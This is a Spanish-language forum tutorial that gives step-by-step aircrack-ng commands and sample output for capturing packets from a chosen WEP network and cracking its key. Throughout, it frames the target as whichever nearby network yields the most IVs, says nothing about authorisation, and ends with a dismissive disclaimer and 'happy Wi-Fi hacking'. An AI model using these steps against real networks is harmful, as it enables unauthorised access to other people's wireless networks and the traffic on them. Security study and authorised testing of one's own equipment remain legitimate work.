Realizado bajo la distribucion de Ubuntu (Lucid Lynx 10.04)
Totalmente funcional..

Lo primero y principal de este manual es instalar la suite de Aircrack-ng, si ya la tenemos obviemos este paso..
Para instalar dicha suite no basta mas que teclear en nuestra terminal:
Código: Seleccionar todo
sudo apt-get install aircrack-ng
Una ves descargado, en consola tipearemos:
Código: Seleccionar todo
aircrack-ng
[Enlace externo eliminado para invitados]
Necesitaremos saber el nombre de nuestra interfaz de RED, si ya lo sabemos obviamos este paso, para saber nuestro nombre de interfaz en consola tecleamos:
Código: Seleccionar todo
sudo airmon-ng
Código: Seleccionar todo
sudo airodump-ng wlan0
Código: Seleccionar todo
CH 9 ][ Elapsed: 4 s ][ 2007-02-25 16:47
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN EJEMPLO
00:14:6C:7A:41:81 34 100 57 14 1 9 11 WEP WEP EJEMPLO
1. El tipo de clave que utiliza [ENC]
2. La MAC del punto de acceso al que queremos atacar [BSSID]
3. El canal de la red que queremos atacar [CH]
4. Comprobar que esta capturando IV's, sin esto no podremos hacer nada... [#Data]
Ahora de todas las redes que detectemos, una buena opción es elegir la red de la cual consigamos capturar mas IV's [#Data]
Elegida la RED que deseas crackear, empezamos a capturar paquetes de esta con el comando:
Código: Seleccionar todo
sudo airodump-ng wlan0 --bssid 00:00:00:00:00:00 --channel 5 --w out
^- Recuerden lo de sustituir wlan0 por su nombre de RED -^
Donde en el comando anterior
--bssid Es el numero de MAC del punto de acceso al que queremos atacar.
--channel Es el canal en el que emite la red a la que queremos atacar.
--w out Es el nombre del archivo en el que se guardaran las paquetes capturados.
Nos toparemos con unos datos parecidos a estos:
Código: Seleccionar todo
CH 9 ][ Elapsed: 12 min ][ 2007-02-25 17:24
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7A:41:81 34 100 59424 33258 1 9 11 WEP WEP EJEMPLO
Luego de el escaneo y todo, si conseguimos encontrar una cantidad buena de IV's intentamos crackear la clave con el siguiente comando:
Código: Seleccionar todo
sudo aircrack-ng *.cap
Si todo va bien, pues en cuestion de 10 a 15 minutos tendremos nuestra clave WEP
Según la web oficial de Aircrack-ng es necesario tener 600.000 IV's para claves WEP de 40 bits, y 1.500.000 IV's para claves de 104 bits, aunque por experiencia propia, recomiendo ir probando cuando dispongamos de una cantidad considerable de IV's.
Espero disfruten y aprendan con este tutorial x'D
No me hago responsable de lo que hagan con esto, bla, bla, bla..
Feliz hacking de Waifai
Un saludo - Kode :3